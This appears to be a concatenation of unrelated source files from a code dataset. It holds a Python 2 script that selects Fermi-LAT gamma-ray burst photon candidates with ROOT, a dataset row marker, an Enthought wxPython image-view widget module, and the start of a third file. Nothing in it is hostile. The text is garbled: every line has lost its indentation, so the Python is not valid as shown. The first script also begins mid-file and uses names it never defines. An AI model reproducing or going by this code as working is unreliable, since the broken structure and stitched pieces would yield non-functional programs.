pathList = "/nfs/farm/g/glast/u/mtakahas/data/catalogue/PublicTableGRBs.xml"
fileList = ET.parse(pathList)
rtXml = fileList.getroot()
# OFF regions
nOff = 4;
degOffOffset = 14.0;
print "===================="
# Making all sky map
listFileIn = par[2:]
print listFileIn
aliasSelections = yaml.load(open('/afs/slac.stanford.edu/u/gl/mtakahas/eventSelect/config/pass8_event_selections.yaml','r'))
for nameFileIn in listFileIn:
print ""
print "========================================================================"
fileIn = ROOT.TFile(nameFileIn, "READ")
print fileIn.GetName()
print "========================================================================"
chainData = fileIn.Get("MeritTuple")
nameFileFriend = nameFileIn.replace(".root", "_" + nameVarBDT + ".root")
chainData.AddFriend("friendTemp=MeritTuple", nameFileFriend)
for k,v in aliasSelections.iteritems():
chainData.SetAlias(k,v)
nameFileOut = nameFileIn[:-5] + "_PHOTON_" + nameVarBDT + nameFileSuffix + ".root"
fileOut = ROOT.TFile(nameFileOut, 'UPDATE')
#------ Source data -----
indexGrbName = nameFileIn.rindex('GRB') + 3
indexGrbNameEnd = indexGrbName + 9
nameGrb = nameFileIn[indexGrbName:indexGrbNameEnd]
for grb in rtXml: #for iGrb in range(trList.GetEntries())
if grb.findtext("./GRBNAME")==nameGrb:
trigger_time = float(grb.findtext("./MET"))
if grb.findtext("./ERROR") == "--" or grb.findtext("./ERROR") == "":
if grb.findtext("./LATERROR") == "--" or grb.findtext("./LATERROR") == "":
err_rad = 0.
else:
err_rad = float(grb.findtext("./LATERROR"))
else:
if float(grb.findtext("./ERROR")) > float(grb.findtext("./LATERROR")):
err_rad = float(grb.findtext("./LATERROR"))
raSrc = float(grb.findtext("./LATRA"))
decSrc = float(grb.findtext("./LATDEC"))
else:
err_rad = float(grb.findtext("./ERROR"))
raSrc = float(grb.findtext("./RA"))
decSrc = float(grb.findtext("./DEC"))
print ""
print "==============="
print "GRB", nameGrb
print "==============="
print "(", raSrc, ",", decSrc, "), Error radius:", err_rad, "Trigger MET:", trigger_time
nEvent = chainData.GetEntries()
print "Total number of events:", nEvent
#distCut = min(7.0, 5.0+err_rad)
# Plot
#mgr = ROOT.TMultiGraph("mgr", "Gamma-like events within {0} deg".format(distCut))
mgr = ROOT.TMultiGraph("mgr", "Gamma-like events around the GRB")
greOn = []
greOff=[]
for pC in range(len(aaStrSelect)):
greOn.append([])
greOff.append([])
for qC in range(len(aaStrSelect[pC])):
greOn[-1].append(ROOT.TGraphErrors())
greOn[-1][-1].SetName("greOn_{0}_{1}".format(pC, qC))
greOn[-1][-1].SetTitle("{0} ON".format(aaStrSelect[pC][qC]))
greOn[-1][-1].SetMarkerStyle(20)
if pC==0:
greOn[-1][-1].SetMarkerColor(13-12*qC)
elif pC==1:
greOn[-1][-1].SetMarkerColor(kRed+3*(qC-2))
greOn[-1][-1].SetMarkerStyle(20)
mgr.Add(greOn[-1][-1])
greOff[-1].append([])
for hRegio in range(nOff):
greOff[-1][-1].append(ROOT.TGraphErrors())
greOff[-1][-1][-1].SetName("greOff_{0}_{1}_{2}".format(pC, qC, hRegio+1))
greOff[-1][-1][-1].SetTitle("{0} Off{1} events".format(aaStrSelect[pC][qC], hRegio+1))
if pC==0:
greOff[-1][-1][-1].SetMarkerColor(13-12*qC)
elif pC==1:
greOff[-1][-1][-1].SetMarkerColor(kRed+3*(qC-2))
greOff[-1][-1][-1].SetMarkerStyle(25+hRegio)
mgr.Add(greOff[-1][-1][-1])
mgrZenith = ROOT.TMultiGraph("mgrZenith", "Zenith angle within ON/OFF regions")
grZenith = []
for gRegio in range(nOff+1):
grZenith.append(ROOT.TGraph())
grZenith[-1].SetName("grZenith{0}".format(gRegio))
if gRegio==0:
grZenith[0].SetTitle("ON")
else:
grZenith[gRegio].SetTitle("OFF{0}".format(gRegio))
grZenith[gRegio].SetMarkerStyle(7)
grZenith[gRegio].SetMarkerColor(akColor(gRegio))
mgrZenith.Add(grZenith[-1])
#------ TTree setting -----
trm = []
c = np.zeros(1, dtype=np.int32)
s = np.zeros(1, dtype=np.int32)
ty = np.zeros(1, dtype=np.int32)
ngrb = np.zeros(1, dtype=int)
evid = np.zeros(1, dtype=int)
run = np.zeros(1, dtype=int)
e = np.zeros(1, dtype=float)
t = np.zeros(1, dtype=float)
lt = np.zeros(1, dtype=float)
ra = np.zeros(1, dtype=float)
dec = np.zeros(1, dtype=float)
l = np.zeros(1, dtype=float)
b = np.zeros(1, dtype=float)
z = np.zeros(1, dtype=float)
az = np.zeros(1, dtype=float)
bep = np.zeros(1, dtype=float)
p = np.zeros(1, dtype=float)
ctp = np.zeros(1, dtype=float)
rawe = np.zeros(1, dtype=float)
cth = np.zeros(1, dtype=float)
th = np.zeros(1, dtype=float)
phi = np.zeros(1, dtype=float)
dist = np.zeros(1, dtype=float)
grbt = np.zeros(1, dtype=float)
flag = np.zeros(1, dtype=int)
# for iRegio in range(1+nOff):
#if iRegio==0:
#trm.append(ROOT.TTree("trGammas", "Gamma-like events"))
trm = ROOT.TTree("trGammas", "Gamma-like events")
#else:
# trm.append(ROOT.TTree("trGammasOFF{0}".format(iRegio), "Gamma-like events in the OFF region {0}".format(iRegio)))
trm.Branch('Category',c,'c/I') # 1:CalTkr or 2:CalOnly
trm.Branch('EVENT_CLASS',s,'s/I') # 4: TRANSIENT100, 128: SOURCE, 4096: CalOnly_10xEGB, 8192: CalOnly_3xEGB, 16384: CalOnly_1xEGB
trm.Branch('EVENT_TYPE',ty,'ty/I') # 1: FRONT, 2: BACK, 4, PSF0, ... , 32: PSF3, 64: EDISP0, ... , 512: EDISP3
trm.Branch('GRB_NAME',ngrb,'ngrb/I') #EvtEventId
trm.Branch('EVENT_ID',evid,'evid/I') #EvtEventId
trm.Branch('RUN_ID',run,'run/I') #EvtRun
trm.Branch('ENERGY',e,'e/D') #FT1Energy
trm.Branch('TIME',t,'t/D') #EvtElapsedTime
trm.Branch('LIVETIME',lt,'lt/D') #EvtLiveTime
trm.Branch('RA',ra,'ra/D') #FT1Ra
trm.Branch('DEC',dec,'dec/D') #FT1Dec
trm.Branch('L',l,'l/D') #FT1L
trm.Branch('B',b,'b/D') #FT1B
trm.Branch('ZENITH_ANGLE',z,'z/D') #FT1ZenithTheta
trm.Branch('EARTH_AZIMUTH_ANGLE',az,'az/D') #FT1EarthAzimuth
trm.Branch('WP8CTCalOnlyBestEnergyProb',bep,'bep/D') # (WP8CalOnlyBEPCaseE_myBDT+1.0)/2.0
trm.Branch('WP8CTCalOnlyProb',p,'p/D') # (S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_BDTG1000D06+1.0)/2.0
trm.Branch('WP8CTAllProb',ctp,'ctp/D') #WP8CTAllProb
trm.Branch('CalEnergyRaw',rawe,'rawe/D') #CalEnergyRaw
trm.Branch('CosTHETA',cth,'cth/D') #
trm.Branch('THETA',th,'th/D') # FT1Theta or -Cal1MomZDir
trm.Branch('PHI',phi,'phi/D') # FT1Phi or Cal1MomYDir/Cal1MomXDir
trm.Branch('DIST',dist,'dist/D')
trm.Branch('GRB_TIME',grbt,'grbt/D')
trm.Branch('FLAG',flag,'flag/I') #flag for this GRB, 0: On, 1,2,3,4,...: Off, -1: Other
timeStart = datetime.datetime.now()
#print timeStart
vecTgt = []
vecTgt.append(np.array([cos(radians(decSrc))*cos(radians(raSrc)), cos(radians(decSrc))*sin(radians(raSrc)), sin(radians(decSrc))]))
vecTgt.append(np.array([cos(radians(decSrc-degOffOffset))*cos(radians(raSrc)), cos(radians(decSrc-degOffOffset))*sin(radians(raSrc)), sin(radians(decSrc-degOffOffset))]))
vecTgt.append(np.array([cos(radians(decSrc))*cos(radians(raSrc-degOffOffset/cos(radians(decSrc)))), cos(radians(decSrc))*sin(radians(raSrc-degOffOffset/cos(radians(decSrc)))), sin(radians(decSrc))]))
vecTgt.append(np.array([cos(radians(decSrc+degOffOffset))*cos(radians(raSrc)), cos(radians(decSrc+degOffOffset))*sin(radians(raSrc)), sin(radians(decSrc+degOffOffset))]))
vecTgt.append(np.array([cos(radians(decSrc))*cos(radians(raSrc+degOffOffset/cos(radians(decSrc)))), cos(radians(decSrc))*sin(radians(raSrc+degOffOffset/cos(radians(decSrc)))), sin(radians(decSrc))]))
for iEvent in range(nEvent):
chainData.GetEntry(iEvent)
flag[0] = -1;
e[0] = chainData.EvtJointLogEnergy
rawe[0] = chainData.CalEnergyRaw
c[0] = 0
s[0] = 0
ty[0] = 0
ngrb[0] = float(nameGrb)
evid[0] = chainData.EvtEventId
run[0] = chainData.EvtRun
t[0] = chainData.EvtElapsedTime
grbt[0] = t[0] - trigger_time
lt[0] = chainData.EvtLiveTime
bep[0] = (chainData.WP8CalOnlyBEPCaseE_myBDT+1.0)/2.0
p[0] = (chainData.S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_BDTG1000D06+1.0)/2.0
ctp[0] = chainData.WP8CTAllProb
binEnergy = max(min(nEnergyBin-1, int((e[0]-vEnergyLow)/vEnergyBinWidth * (int(e[0]<vEnergyLow)*(-2)+1)) ), 0)
if (chainData.TkrNumTracks>0) and (math.log10(max(chainData.CalTrackAngle,1E-4)) <= (0.529795)*(e[0] < 3.000000) + ((1.0)*((0.529795)*(1.0)+(-1.379791)*(pow((e[0]-3.000000)/0.916667,1))+(0.583401)*(pow((e[0]-3.000000)/0.916667,2))+(-0.075555)*(pow((e[0]-3.000000)/0.916667,3))))*(e[0] >= 3.000000 and e[0] <= 5.750000) + (-0.398962)*(e[0] > 5.750000)) and chainData.EvtCalCsIRLn>4 and chainData.WP8CTPSFTail>0.05 and chainData.WP8CTBestEnergyProb>0.1 and chainData.FswGamState == 0: # CalTkr
c[0] = 1
z[0] = chainData.FT1ZenithTheta
az[0] = chainData.FT1EarthAzimuth
ra[0] = chainData.FT1Ra
dec[0] = chainData.FT1Dec
l[0] = chainData.FT1L
b[0] = chainData.FT1B
cth[0] = chainData.Cal1MomZDir
th[0] = chainData.FT1Theta
phi[0] = chainData.FT1Phi
if ( -math.log10(1.0-ctp[0]) >= (0.010000)*(e[0] < 1.250000) + ((e[0] <= 1.750000)*((0.010000)*(1.0)+(0.000000)*(math.pow((e[0]-1.250000)/0.500000,1))+(0.018669)*(math.pow((e[0]-1.250000)/0.500000,2)))+((e[0] > 1.750000)*(e[0] <= 2.250000))*((0.028669)*(1.0)+(0.037338)*(math.pow((e[0]-1.750000)/0.500000,1))+(-0.017111)*(math.pow((e[0]-1.750000)/0.500000,2)))+((e[0] > 2.250000)*(e[0] <= 2.750000))*((0.048897)*(1.0)+(0.003117)*(math.pow((e[0]-2.250000)/0.500000,1))+(0.001967)*(math.pow((e[0]-2.250000)/0.500000,2)))+((e[0] > 2.750000)*(e[0] <= 3.250000))*((0.053980)*(1.0)+(0.007050)*(math.pow((e[0]-2.750000)/0.500000,1))+(-0.003525)*(math.pow((e[0]-2.750000)/0.500000,2)))+((e[0] > 3.250000)*(e[0] <= 3.750000))*((0.057505)*(1.0)+(0.000000)*(math.pow((e[0]-3.250000)/0.500000,1))+(0.121963)*(math.pow((e[0]-3.250000)/0.500000,2)))+((e[0] > 3.750000)*(e[0] <= 4.250000))*((0.179468)*(1.0)+(0.243925)*(math.pow((e[0]-3.750000)/0.500000,1))+(0.493075)*(math.pow((e[0]-3.750000)/0.500000,2)))+((e[0] > 4.250000)*(e[0] <= 4.750000))*((0.916468)*(1.0)+(1.230076)*(math.pow((e[0]-4.250000)/0.500000,1))+(-0.501532)*(math.pow((e[0]-4.250000)/0.500000,2)))+(e[0] > 4.750000)*((1.645012)*(1.0)+(0.227011)*(math.pow((e[0]-4.750000)/0.500000,1))+(0.029483)*(math.pow((e[0]-4.750000)/0.500000,2))))*(e[0] >= 1.250000 and e[0] <= 5.750000) + (2.216967)*(e[0] > 5.750000) ): #P8R1_TRANSIENT_R100
if ( -math.log10(1.0-ctp[0]) >= (0.080914)*(e[0] < 1.250000) + ((e[0] <= 1.750000)*((0.080914)*(1.0)+(0.108897)*(pow((e[0]-1.250000)/0.500000,1))+(0.377870)*(pow((e[0]-1.250000)/0.500000,2)))+((e[0] > 1.750000)*(e[0] <= 2.250000))*((0.567682)*(1.0)+(0.864637)*(pow((e[0]-1.750000)/0.500000,1))+(-0.182318)*(pow((e[0]-1.750000)/0.500000,2)))+((e[0] > 2.250000)*(e[0] <= 2.750000))*((1.250000)*(1.0)+(0.500000)*(pow((e[0]-2.250000)/0.500000,1))+(-0.085000)*(pow((e[0]-2.250000)/0.500000,2)))+((e[0] > 2.750000)*(e[0] <= 3.250000))*((1.665000)*(1.0)+(0.330000)*(pow((e[0]-2.750000)/0.500000,1))+(-0.165000)*(pow((e[0]-2.750000)/0.500000,2)))+((e[0] > 3.250000)*(e[0] <= 3.750000))*((1.830000)*(1.0)+(0.000000)*(pow((e[0]-3.250000)/0.500000,1))+(0.285000)*(pow((e[0]-3.250000)/0.500000,2)))+((e[0] > 3.750000)*(e[0] <= 4.250000))*((2.115000)*(1.0)+(0.570000)*(pow((e[0]-3.750000)/0.500000,1))+(-0.185000)*(pow((e[0]-3.750000)/0.500000,2)))+((e[0] > 4.250000)*(e[0] <= 4.750000))*((2.500000)*(1.0)+(0.200000)*(pow((e[0]-4.250000)/0.500000,1))+(0.100000)*(pow((e[0]-4.250000)/0.500000,2)))+(e[0] > 4.750000)*((2.800000)*(1.0)+(0.400000)*(pow((e[0]-4.750000)/0.500000,1))+(-0.112171)*(pow((e[0]-4.750000)/0.500000,2))))*(e[0] >= 1.250000 and e[0] <= 5.750000) + (3.151318)*(e[0] > 5.750000) ) and ( chainData.WP8CTAllBkProb >= (0.366167)*(e[0] < 1.250000) + ((e[0] <= 1.541667)*((0.366167)*(1.0)+(0.028500)*(pow((e[0]-1.250000)/0.291667,1))+(-0.056500)*(pow((e[0]-1.250000)/0.291667,2))+(0.106667)*(pow((e[0]-1.250000)/0.291667,3)))+((e[0] > 1.541667)*(e[0] <= 1.833333))*((0.444833)*(1.0)+(0.235500)*(pow((e[0]-1.541667)/0.291667,1))+(0.263500)*(pow((e[0]-1.541667)/0.291667,2))+(-0.162667)*(pow((e[0]-1.541667)/0.291667,3)))+((e[0] > 1.833333)*(e[0] <= 2.125000))*((0.781167)*(1.0)+(0.274500)*(pow((e[0]-1.833333)/0.291667,1))+(-0.224500)*(pow((e[0]-1.833333)/0.291667,2))+(0.072667)*(pow((e[0]-1.833333)/0.291667,3)))+(e[0] > 2.125000)*((0.903833)*(1.0)+(0.043500)*(pow((e[0]-2.125000)/0.291667,1))+(-0.006500)*(pow((e[0]-2.125000)/0.291667,2))+(-0.000333)*(pow((e[0]-2.125000)/0.291667,3))))*(e[0] >= 1.250000 and e[0] <= 3.000000) + (0.966833)*(e[0] > 3.000000) ): #P8R1_SOURCE_AllProbFilter&&P8R1_SOURCE_AllBkProbFilter
s[0] = 128#3
aaNumEventClass[0][1] = aaNumEventClass[0][1]+1
else:
s[0] = 4#1
aaNumEventClass[0][0] = aaNumEventClass[0][0]+1
#trm.Fill()
elif chainData.Cal1RawEnergySum>=20000 and chainData.Cal1MomZDir>=0.1 and chainData.Cal1MomZCrossSide840>=0.0 and (chainData.WP8CalOnlyBEPCaseE_myBDT+1.0)/2.0>0.06 and (chainData.TkrNumTracks==0 or (math.log10(max(chainData.CalTrackAngle,1E-4)) > (0.529795)*(e[0] < 3.000000) + ((1.0)*((0.529795)*(1.0)+(-1.379791)*(pow((e[0]-3.000000)/0.916667,1))+(0.583401)*(pow((e[0]-3.000000)/0.916667,2))+(-0.075555)*(pow((e[0]-3.000000)/0.916667,3))))*(e[0] >= 3.000000 and e[0] <= 5.750000) + (-0.398962)*(e[0] > 5.750000))) and chainData.Acd2Cal1VetoSigmaHit>0 and chainData.Cal1TransRms>=10 and chainData.Cal1TransRms<70 and chainData.Cal1MomNumIterations>0 and chainData.FswGamState == 0: # CalOnly
c[0] = 2
z[0] = chainData.FT1CalZenithTheta
az[0] = chainData.FT1CalEarthAzimuth
ra[0] = chainData.FT1CalRa
dec[0] = chainData.FT1CalDec
l[0] = chainData.FT1CalL
b[0] = chainData.FT1CalB
cth[0] = chainData.Cal1MomZDir
th[0] = math.degrees(math.acos(chainData.Cal1MomZDir))
phi[0] = math.degrees(math.atan2(chainData.Cal1MomYDir, chainData.Cal1MomXDir))
if -math.log10(1.0-p[0])>aaValCutBDT[binEnergy+nStartBin][0]: #CalOnly_R100
if -math.log10(1.0-p[0])>aaValCutBDT[binEnergy+nStartBin][1]: #CalOnly_R30
if -math.log10(1.0-p[0])>aaValCutBDT[binEnergy+nStartBin][2]: #CalOnly_R10
s[0]=16384#3
aaNumEventClass[1][2] = aaNumEventClass[1][2]+1
else:
s[0] = 8192#2
aaNumEventClass[1][1] = aaNumEventClass[1][1]+1
else:
s[0] = 4096#1
aaNumEventClass[1][0] = aaNumEventClass[1][0]+1
if(e[0]<4.55 or cth[0]<0.6):
ty[0] = ty[0]+2 #BACK
else:
ty[0] = ty[0]+1 #FRONT
vecEvt = np.array([cos(radians(dec[0]))*cos(radians(ra[0])), cos(radians(dec[0]))*sin(radians(ra[0])), sin(radians(dec[0]))])
aDist = []
distCut = htgPerf.getPSF95_cth(c[0]-1, 0*(s[0]==4 or s[0]==4096)+1*(s[0]==128 or s[0]==8192)+2*(s[0]==16384), e[0], cth[0]) + err_rad
for iRegio in range(1+nOff):
radTheta = acos(np.dot(vecTgt[iRegio], vecEvt))
aDist.append(degrees(radTheta))
if iRegio==0:
dist[0] = aDist[0]
if aDist[iRegio] < distCut:
grZenith[iRegio].SetPoint(grZenith[iRegio].GetN(), t[0]-trigger_time, z[0])
#if s[0]>0:
#print "============================"
if iRegio==0:
flag[0] = 0
if s[0]>0:
print ""
print "== ON photon candidate!!! =="
if c[0] == 1:
if s[0] == 4:
greOn[0][0].SetPoint(greOn[0][0].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 128:
greOn[0][1].SetPoint(greOn[0][1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif c[0] == 2:
if s[0] == 4096:
greOn[1][0].SetPoint(greOn[1][0].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 8192:
greOn[1][1].SetPoint(greOn[1][1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 16384:
greOn[1][2].SetPoint(greOn[1][2].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif iRegio>0:
flag[0] = iRegio
if s[0]>0:
#print ""
#print "== OFF{0} photon candidate! ==".format(iRegio)
if c[0] == 1:
if s[0] == 4:
greOff[0][0][iRegio-1].SetPoint(greOff[0][0][iRegio-1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 128:
greOff[0][1][iRegio-1].SetPoint(greOff[0][1][iRegio-1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif c[0] == 2:
if s[0] == 4096:
greOff[1][0][iRegio-1].SetPoint(greOff[1][0][iRegio-1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 8192:
greOff[1][1][iRegio-1].SetPoint(greOff[1][1][iRegio-1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 16384:
greOff[1][2][iRegio-1].SetPoint(greOff[1][2][iRegio-1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
if s[0]>0 and iRegio==0:
print "Event No.", iEvent
print "Event category:", cfg.aStrSelect[c[0]-1]
print "Event class:", s[0]
print "Time from the trigger:", t[0]-trigger_time, "s"
print "Anglular distance:", dist[0], "deg"
print "PSF68:", htgPerf.getPSF68_cth(c[0]-1, 0*(s[0]==4 or s[0]==4096)+1*(s[0]==128 or s[0]==8192)+2*(s[0]==16384), e[0], cth[0]), "deg"
print "Energy:", pow(10,e[0]-3), "GeV"
print "Edisp68:", 100*htgPerf.getEdisp68_cth(c[0]-1, 0*(s[0]==4 or s[0]==4096)+1*(s[0]==128 or s[0]==8192)+2*(s[0]==16384), e[0], cth[0]), "%"
print "Cos( inclination angle ):", cth[0]
print "Zenith angle:", z[0], "deg"
print "Run ID:", run[0]
print "Event ID:", evid[0]
trm.Fill()
# trm.Fill()
if iEvent%(nEvent/200)==0:
rate = int((iEvent*100.)/nEvent+0.5)
if rate>0:
nt = (datetime.datetime.now() - timeStart).seconds * (100.-rate)/rate
meter = "\r[{0}{1}] {2} Wait {3} hr {4} min".format("=" * rate, ' ' * (100-rate), aaNumEventClass, int(nt/3600), (int(nt)%3600)/60+1)
else:
meter = "\r[{0}{1}]".format("=" * rate, ' ' * (100-rate))
sys.stdout.write(meter)
sys.stdout.flush()
cEvent = ROOT.TCanvas("cEvent", "GRB {0} gamma-like events within {1} deg".format(nameGrb, distCut))
cEvent.cd()
mgr.Draw("AP")
mgr.GetXaxis().SetTitle("Time [s]")
mgr.GetYaxis().SetTitle("Energy [GeV]")
leg = ROOT.TLegend(0.67, 0.5, 0.88, 0.88)
for pD in range(len(aaStrSelect)):
for qD in range(len(aaStrSelect[pD])):
leg.AddEntry(greOn[pD][qD], greOn[pD][qD].GetTitle(), "p")
for rr in range(nOff):
leg.AddEntry(greOff[1][0][rr], "OFF{0}".format(rr+1), "p")
leg.Draw("same")
cZenith = ROOT.TCanvas("cZenith", "Zenith angle of ON/OFF events")
cZenith.cd()
mgrZenith.Draw("AP")
mgrZenith.GetXaxis().SetTitle("Time [s]")
mgrZenith.GetYaxis().SetTitle("Zenith angle [deg]")
legZenith = ROOT.TLegend(0.67, 0.5, 0.88, 0.88)
for rz in range(nOff+1):
legZenith.AddEntry(grZenith[rz], grZenith[rz].GetTitle(), "p")
legZenith.Draw("same")
print ""
fileOut.cd()
trm.Write()
cEvent.Write()
cZenith.Write()
print "Finished!"
|
5,161 | d4198c2c3706e03ba1bce3e31c5139f01248a184 | #------------------------------------------------------------------------------
# Copyright (c) 2011, Enthought, Inc.
# All rights reserved.
#------------------------------------------------------------------------------
import wx
from .wx_control import WXControl
from ...components.image_view import AbstractTkImageView
class wxBitmapWidget(wx.Panel):
""" A wx.Panel subclass which paints a provided wx.Bitmap.
This differs from wx.StaticBitmap in that it provides the option to
scale the provided bitmap to the bounds of the widget. If the widget
is set to scale its contents, low quality scaling will occur during
resize, with a high quality pass performed once resizing as finished.
"""
def __init__(self, parent):
""" Initialize a wxBitmapWidget.
Parameters
----------
parent : wx.Window
The wx.Window object which serves as the widget parent.
"""
super(wxBitmapWidget, self).__init__(parent)
self._bitmap = None
self._scaled_contents = False
self._preserve_aspect_ratio = False
self._allow_upscaling = False
self._resize_timer = None
self._resizing = False
self.Bind(wx.EVT_PAINT, self.OnPaint)
#--------------------------------------------------------------------------
# Private API
#--------------------------------------------------------------------------
def OnPaint(self, event):
""" The paint event handler for the widget.
"""
bmp = self._bitmap
if bmp is None:
return
bmp_width, bmp_height = bmp.GetWidth(), bmp.GetHeight()
if bmp_width == 0 or bmp_height == 0:
return
evt_x = 0
evt_y = 0
evt_width, evt_height = self.GetSize().asTuple()
if not self._scaled_contents:
# If the image isn't scaled, it is centered if possible.
# Otherwise, it's painted at the origin and clipped.
paint_x = max(0, int((evt_width / 2. - bmp_width / 2.) + evt_x))
paint_y = max(0, int((evt_height / 2. - bmp_height / 2.) + evt_y))
paint_width = bmp_width
paint_height = bmp_height
else:
# If the image *is* scaled, it's scaled size depends on the
# size of the paint area as well as the other scaling flags.
if self._preserve_aspect_ratio:
bmp_ratio = float(bmp_width) / bmp_height
evt_ratio = float(evt_width) / evt_height
if evt_ratio >= bmp_ratio:
if self._allow_upscaling:
paint_height = evt_height
else:
paint_height = min(bmp_height, evt_height)
paint_width = int(paint_height * bmp_ratio)
else:
if self._allow_upscaling:
paint_width = evt_width
else:
paint_width = min(bmp_width, evt_width)
paint_height = int(paint_width / bmp_ratio)
else:
if self._allow_upscaling:
paint_height = evt_height
paint_width = evt_width
else:
paint_height = min(bmp_height, evt_height)
paint_width = min(bmp_width, evt_width)
# In all cases of scaling, we know that the scaled image is
# no larger than the paint area, and can thus be centered.
paint_x = int((evt_width / 2. - paint_width / 2.) + evt_x)
paint_y = int((evt_height / 2. - paint_height / 2.) + evt_y)
# Scale the bitmap if needed, using a faster method if the
# image is currently being resized
if paint_width != bmp_width or paint_height != bmp_height:
img = bmp.ConvertToImage()
if self._resizing:
quality = wx.IMAGE_QUALITY_NORMAL
else:
quality = wx.IMAGE_QUALITY_HIGH
img.Rescale(paint_width, paint_height, quality)
bmp = wx.BitmapFromImage(img)
# Finally, draw the bitmap into the computed location
dc = wx.PaintDC(self)
dc.DrawBitmap(bmp, paint_x, paint_y)
def OnResize(self, event):
""" The resize event handler for the widget.
This method is only bound and called when content scaling is
enabled. It starts(restarts) a timer to perform a high quality
scaled repaint when resizing is finished.
"""
self._resizing = True
self._resize_timer.Start(60, True)
def OnResizeEnd(self, event):
""" The repaint timer event handler.
This method is only bound and called when content scaling is
enabled and resizing has completed. It triggers a high quality
repaint.
"""
self._resizing = False
self.Refresh()
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def GetBestSize(self):
""" Overridden method to return the size of the bitmap as the
best size for the widget.
"""
bmp = self._bitmap
return wx.Size(bmp.GetWidth(), bmp.GetHeight())
def GetBestSizeTuple(self):
""" Overridden method to return the size of the bitmap as the
best size for the widget.
"""
return self.GetBestSize().asTuple()
def GetBitmap(self, bitmap):
""" Get the underlying wx.Bitmap used to paint the control.
Returns
-------
result : wx.Bitmap or None
The bitmap being used to paint the control, or None if
no bitmap has been supplied.
"""
return self._bitmap
def SetBitmap(self, bitmap):
""" Set the underlying wx.Bitmap and refresh the widget.
Parameters
----------
bitmap : wx.Bitmap
The bitmap to paint on the widget.
"""
self._bitmap = bitmap
self.Refresh()
def GetScaledContents(self):
""" Whether or not the bitmap is scaled to fit the bounds.
Returns
-------
result : bool
Whether or not the bitmap is scaled to fit the bounds of
the widget.
"""
return self._scaled_contents
def SetScaledContents(self, scaled):
""" Set whether or not the bitmap should be scaled to fit the
bounds of the widget.
Parameters
----------
scaled : bool
Whether or not to scale the bitmap to fit the bounds of the
widget.
"""
if scaled:
if not self._scaled_contents:
self._scaled_contents = True
self._resize_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnResizeEnd)
self.Bind(wx.EVT_SIZE, self.OnResize)
else:
if self._scaled_contents:
self._scaled_contents = False
self._timer = None
self.Unbind(wx.EVT_TIMER, handler=self.OnResizeEnd)
self.Unbind(wx.EVT_SIZE, handler=self.OnResize)
self.Refresh()
def GetPreserveAspectRatio(self):
""" Returns whether or not the aspect ratio of the image is
maintained during a resize.
"""
return self._preserve_aspect_ratio
def SetPreserveAspectRatio(self, preserve):
""" Set whether or not to preserve the image aspect ratio.
Parameters
----------
preserve : bool
If True then the aspect ratio of the image will be preserved
if it is scaled to fit. Otherwise, the aspect ratio will be
ignored.
"""
self._preserve_aspect_ratio = preserve
self.Refresh()
def GetAllowUpscaling(self):
""" Returns whether or not the image can be scaled greater than
its natural size.
"""
return self._allow_upscaling
def SetAllowUpscaling(self, allow):
""" Set whether or not to allow the image to be scaled beyond
its natural size.
Parameters
----------
allow : bool
If True, then the image may be scaled larger than its
natural if it is scaled to fit. If False, the image will
never be scaled larger than its natural size. In either
case, the image may be scaled smaller.
"""
self._allow_upscaling = allow
self.Refresh()
class WXImageView(WXControl, AbstractTkImageView):
""" A Wx implementation of ImageView.
"""
#: The internal cached size hint which is used to determine whether
#: of not a size hint updated event should be emitted when the text
#: in the label changes
_cached_size_hint = None
#--------------------------------------------------------------------------
# Setup methods
#--------------------------------------------------------------------------
def create(self, parent):
""" Creates the underlying wxBitmapWidget control.
"""
self.widget = wxBitmapWidget(parent)
def initialize(self):
""" Initializes the attributes on the underlying control.
"""
super(WXImageView, self).initialize()
shell = self.shell_obj
self.set_image(shell.image)
self.set_scale_to_fit(shell.scale_to_fit)
self.set_preserve_aspect_ratio(shell.preserve_aspect_ratio)
self.set_allow_upscaling(shell.allow_upscaling)
#--------------------------------------------------------------------------
# Implementation
#--------------------------------------------------------------------------
def shell_image_changed(self, image):
""" The change handler for the 'image' attribute on the shell
component.
"""
self.set_image(image)
def shell_scale_to_fit_changed(self, scale_to_fit):
""" The change handler for the 'scale_to_fit' attribute on the
shell component.
"""
self.set_scale_to_fit(scale_to_fit)
def shell_preserve_aspect_ratio_changed(self, preserve):
""" The change handler for the 'preserve_aspect_ratio' attribute
on the shell component.
"""
self.set_preserve_aspect_ratio(preserve)
def shell_allow_upscaling_changed(self, allow):
""" The change handler for the 'allow_upscaling' attribute on
the shell component.
"""
self.set_allow_upscaling(allow)
#--------------------------------------------------------------------------
# Widget Update Methods
#--------------------------------------------------------------------------
def set_image(self, image):
""" Sets the image on the underlying wxBitmapWidget.
"""
bmp = image.as_wxBitmap() if image is not None else None
self.widget.SetBitmap(bmp)
# Emit a size hint updated event if the size hint has actually
# changed. This is an optimization so that a constraints update
# only occurs when the size hint has actually changed. This
# logic must be implemented here so that the label has been
# updated before the new size hint is computed. Placing this
# logic on the shell object would not guarantee that the label
# has been updated at the time the change handler is called.
cached = self._cached_size_hint
hint = self._cached_size_hint = self.size_hint()
if cached != hint:
self.shell_obj.size_hint_updated()
def set_scale_to_fit(self, scale_to_fit):
""" Sets whether or not the image scales with the underlying
control.
"""
self.widget.SetScaledContents(scale_to_fit)
def set_preserve_aspect_ratio(self, preserve):
""" Sets whether or not to preserve the aspect ratio of the
image when scaling.
"""
self.widget.SetPreserveAspectRatio(preserve)
def set_allow_upscaling(self, allow):
""" Sets whether or not the image will scale beyond its natural
size.
"""
self.widget.SetAllowUpscaling(allow)
|
5,162 | 22d3ff0fca9a5537da37bfbc968d83ec6f919752 | #!/usr/bin/env python2
## -*- coding: utf-8 -*-
